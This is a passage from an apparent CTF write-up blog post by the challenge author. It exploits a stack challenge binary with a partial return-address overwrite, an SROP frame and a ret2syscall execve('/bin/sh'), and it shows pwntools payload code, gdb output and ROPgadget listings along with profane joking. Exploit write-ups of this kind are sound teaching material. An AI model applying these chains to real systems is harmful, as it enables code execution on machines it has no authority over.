main_patched: 0x00000000004041b8  ->  0x00007f9545bdacb5  ->  0x5375fcf88348595a
main_patched: 0x00000000004041e8  ->  0x00007f9545bdf49f <read+0x1f>  ->  0xe9c7894818c48348
main_patched: 0x00000000004042b8  ->  0x00007f9545bdacb5  ->  0x5375fcf88348595a
main_patched: 0x00000000004042e8  ->  0x00007f9545bdf49f <read+0x1f>  ->  0xe9c7894818c48348
Note that the function called is read(), which does not null terminate the buffer we read into. read() is extremely nice and gives us very fine-grained control over what bytes we specifically want to write, so we can partially overwrite the least significant bytes of these saved return addresses to point to a more useful gadget.

It is easy to find a target gadget to overwrite to - we just look around at what's within snapping distance from our saved pointers. It turns out that read and readlink are directly adjacent to one another in this libc's .text section. readlink has a syscall gadget.
gef> x/16i 0x00007f9545bdf49f
   0x7f9545bdf49f <read+31>:	add    rsp,0x18
   0x7f9545bdf4a3 <read+35>:	mov    rdi,rax
   0x7f9545bdf4a6 <read+38>:	jmp    0x7f9545bb72da <fetestexcept+668>
   0x7f9545bdf4ab <readlink>:	sub    rsp,0x18
   0x7f9545bdf4af <readlink+4>:	lea    r8,[rsp+0xf]
   0x7f9545bdf4b4 <readlink+9>:	test   rdx,rdx
   0x7f9545bdf4b7 <readlink+12>:	jne    0x7f9545bdf4c6 <readlink+27>
   0x7f9545bdf4b9 <readlink+14>:	lea    r8,[rsp+0xf]
   0x7f9545bdf4be <readlink+19>:	mov    edx,0x1
   0x7f9545bdf4c3 <readlink+24>:	mov    rsi,r8
   0x7f9545bdf4c6 <readlink+27>:	mov    eax,0x59
   0x7f9545bdf4cb <readlink+32>:	syscall
   0x7f9545bdf4cd <readlink+34>:	xor    edx,edx
   0x7f9545bdf4cf <readlink+36>:	test   eax,eax
   0x7f9545bdf4d1 <readlink+38>:	cmovle edx,eax
   0x7f9545bdf4d4 <readlink+41>:	cmp    rsi,r8
gef> 
Perfect. We just need to position an SROP frame beneath that specific gadget (in this case we target the address placed at 0x4049e8).
  14   f = SigreturnFrame(kernel='amd64')
  13   f.rsp = 0x4049e8
  12   f.rip = 0x401181
  11   f.rax = 0x3b
  10   f.rdi = (0x404800 - 0x50)
   9   f.rsi = (0x404800 - 0x10)
   8   f.rdx = 0x0
   7   f.r13 = 0x404300 # this is the write's saved rbp, 0x58
   6   f.r14 = READ # this is the write's saved retaddr, 0x60
   5   
   4   print('[!] writing SROP frame')
   3   p.send(bytes(f)); l()
Funnily enough, our SROP frame does end up intersecting with our write's stored RBP and retaddr values, specifically the r13 and r14 values. We can clobber these, it doesn't matter. Additionally, because we need to call SROP to prepare the registers and eventually call another execve syscall, our stored RIP in the SROP frame actually needs to be a ret instruction, and our rsp needs to point back to the address of the partially-overwritten syscall gadget. This is the only way we can get another syscall.

After we prepare the SROP frame beneath our soon-to-be-overwritten syscall gadget, we pivot back upwards on top of the syscall gadget and write three things:
  1. Our /bin/sh pointer
  2. A retslide downwards to the syscall gadget
  3. A pop rax chain to set rax = 0xf
  4. Our overwritten byte
  14   payload = flat({
  13   │   0x0: b'/bin/sh\x00',
  12   │   0x20: b'sh\x00',
  11   │   0x40: 0x4047d0,
  10   │   0x48: 0
   9   }, filler=b'\x00')
   8   
   7   payload += b'A' * (0x50 - len(payload))
   6   payload += p64(RET) * ((0x4049d8 - 0x404800) // 8)
   5   payload += p64(POP_RAX) + p64(0x0f)
   4   payload += b'\xa0' # partial overwrite
   3   input('[!] writing retslide, pop rax + partial overwrite')
   2   p.send(payload); l()
Debugging, we can see the ret-slide, the pop rax and the overwritten libc pointer:
---------------------------------------------------------------------------------------------------------------------------- stack ----
$rsp  0x0000004049b0|+0x0000|+000: 0x0000000000401181 <main+0x24>  ->  0x00000000c35850c3  <-  retaddr[0], $rbp, $rip
      0x0000004049b8|+0x0008|+001: 0x0000000000401181 <main+0x24>  ->  0x00000000c35850c3  <-  retaddr[0], $rbp, $rip
      0x0000004049c0|+0x0010|+002: 0x0000000000401181 <main+0x24>  ->  0x00000000c35850c3  <-  retaddr[0], $rbp, $rip
      0x0000004049c8|+0x0018|+003: 0x0000000000401181 <main+0x24>  ->  0x00000000c35850c3  <-  retaddr[0], $rbp, $rip
      0x0000004049d0|+0x0020|+004: 0x0000000000401181 <main+0x24>  ->  0x00000000c35850c3  <-  retaddr[0], $rbp, $rip
      0x0000004049d8|+0x0028|+005: 0x0000000000401183  ->  0x000000000000c358
      0x0000004049e0|+0x0030|+006: 0x000000000000000f
      0x0000004049e8|+0x0038|+007: 0x00007ffa8b0ea4a0 <readlinkat+0x19>  ->  0x4e0fc085c931050f
-------------------------------------------------------------------------------------------------------- code: x86:64 (gdb-native) ----
    0x401176 e8a5feffff            <main+0x19>   call   0x401020 <read@plt>
    0x40117b b800000000            <main+0x1e>   mov    eax, 0x0
(Forgive the different colors I'm now debugging inside the alpine container anyway)

Alpine containers actually need a slightly different execve setup in terms of registers, because /bin/sh is aliased to busybox, and busybox requires an argv. But anyways, executing this successfully, we pop our shell.
[+] Detected syscall (arch:X86, mode:64)
    execve(const char __user *filename, const char __user *const __user *argv, const char __user *const __user *envp)
    Parameter            Register             Value
    RET                  $rax                 -
    NR                   $rax                 0x3b
    filename             $rdi                 0x00000000004047b0  ->  0x0068732f6e69622f ('/bin/sh'?)
    argv                 $rsi                 0x00000000004047f0  ->  0x00000000004047d0  ->  0x0000000000006873 ('sh'?)
    envp                 $rdx                 0x0000000000000000
-------------------------------------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:263] Name: "main", stopped at 0x7ffa8b0ea4a0 <readlinkat+0x19>, reason: SINGLE STEP
---------------------------------------------------------------------------------------------------------------------------- trace ----
[*#0] 0x7ffa8b0ea4a0 <readlinkat+0x19> (frame name: __syscall4)

closing thoughts

This challenge sucks because I wrote it.

My original solution to this challenge, where you are gifted rbx control from magic and dreams, is extremely contrived and frankly a lot more interesting (less educational value, so I chose to focus on a more standard partial overwrite -> SROP chain). The one-gadget tool does not work in musl libc, so I just incremented an existing libc address in .bss to system() (using our add gadget, of course).

However, with no nice SROP to set registers, the question of proper rdi setting arises. We have no pop rdi gadget (challs w/ pop rdi are for the weak). Here, real bullshit is required. We forsake Buddhism here, carve pentagrams into our walls with oxblood and forge a deal with Baphomet to open our ROPfu 6-eye in order to see this solution.

After waiting for Baphomet to accept our offering, he will provide the solution on an obsidian stele emerging from the centrepoint of our oxblood pentagram. It involves this mov edi gadget:
wrenches@kitty (mplified-pwn-challenge-v2) > ROPgadget --binary=main | grep edi
0x0000000000401097 : je 0x4010a0 ; mov edi, 0x404008 ; jmp rax
0x00000000004010d9 : je 0x4010e8 ; mov edi, 0x404008 ; jmp rax
0x000000000040106e : mov edi, 0x40115d ; jmp 0x401030
0x0000000000401099 : mov edi, 0x404008 ; jmp rax
0x0000000000401095 : test eax, eax ; je 0x4010a0 ; mov edi, 0x404008 ; jmp rax
0x00000000004010d7 : test eax, eax ; je 0x4010e8 ; mov edi, 0x404008 ; jmp rax
Our only rdi control is mov edi, 0x404008. 0x404008 is a writable region of memory. We just pivot over there and place /bin/sh inside of it. Additionally, because our control flow with this gadget is a jmp rax, we set rax beforehand to return to a ret instruction such that our ROP chain continues. Then we just call system and win.

That is, until system eventually segfaults. Baphomet has unfortunately failed to inform us that system calls posix_spawn, and posix_spawn requires 0x1628 bytes of stack space. Remember that we are now in .bss, which is a page long. Indeed, selling our soul to the Devil came with a price: it is, unfortunately, impossible to call system() at all.
gef> x/16i posix_spawn
   0x7fb03338359b <posix_spawn>:	push   r15
   0x7fb03338359d <posix_spawn+2>:	mov    r15,rsi
   0x7fb0333835a0 <posix_spawn+5>:	push   r14
   0x7fb0333835a2 <posix_spawn+7>:	mov    r14,rdx
   0x7fb0333835a5 <posix_spawn+10>:	push   r13
   0x7fb0333835a7 <posix_spawn+12>:	mov    r13,rdi
   0x7fb0333835aa <posix_spawn+15>:	mov    edi,0x1
   0x7fb0333835af <posix_spawn+20>:	push   r12
   0x7fb0333835b1 <posix_spawn+22>:	mov    r12,r8
   0x7fb0333835b4 <posix_spawn+25>:	push   rbp
   0x7fb0333835b5 <posix_spawn+26>:	mov    rbp,r9
   0x7fb0333835b8 <posix_spawn+29>:	push   rbx
   0x7fb0333835b9 <posix_spawn+30>:	mov    rbx,rcx
   0x7fb0333835bc <posix_spawn+33>:	sub    rsp,0x1628
At this juncture we go back to Christ, who tells us to just use a ret2syscall. He, however, reveals to us that we do not actually need SROP to set any registers. How? Using our edi value planted at 0x404008 and pop rax, we are almost ready to just directly perform an execve syscall anyway. We just need to set rsi. Helpfully, we still have the add primitive and just need to find something to add to.
0x0000000000055f72 : mov esi, dword ptr [rsi + 0x10] ; syscall
0x000000000006a4c4 : mov esi, eax ; mov eax, 0x59 ; syscall
0x0000000000069c94 : mov esi, eax ; syscall
0x0000000000069da7 : mov esi, ebp ; mov rdx, r13 ; syscall
0x000000000005f4bd : mov esi, ebp ; mov rdx, rbx ; syscall
0x0000000000055680 : mov esi, ebp ; sub rsp, 0x10 ; syscall
0x0000000000056771 : mov esi, ebp ; syscall
0x0000000000069fbf : mov esi, ebx ; mov rdx, rbp ; syscall
0x0000000000069f8b : mov esi, ebx ; sub rsp, 0x20 ; syscall
0x000000000005e649 : mov esi, ebx ; sub rsp, 0x28 ; syscall
0x0000000000056933 : mov esi, ebx ; syscall
0x000000000005ed48 : mov esi, ecx ; mov rdx, r8 ; syscall
0x000000000005e88f : mov esi, ecx ; syscall
0x000000000005dfd1 : mov esi, edx ; syscall
0x0000000000043433 : mov esi, esi ; mov eax, 0x12c ; syscall
God rewards us for returning to him, like the Prodigal Son, by giving us a mov esi, ebp ; syscall gadget in musl. We have direct control of rbp, so, this solves the whole challenge. Or alternatively you can leak libc or whatever. Works also.

eof

Anyways I think I have fucking had enough of stack pwn for the next year. Hope you enjoyed reading this blog post. Never forget that there is more to life than the Computer.

The average solve count for these challenges within their respective competitions is 0.33, which, honestly, yea fair. No one even touched my musl pwn I think. The thing about these challenges is that there is just enough variance in technique to be fun (it really is remarkable how many different ways you can attack such a tightly related kind of challenge, whether it be SROP, partial overwrites and such). You can basically do whatever the fuck you want, and there is a lot of joy in that.

Reward for reaching the end of this post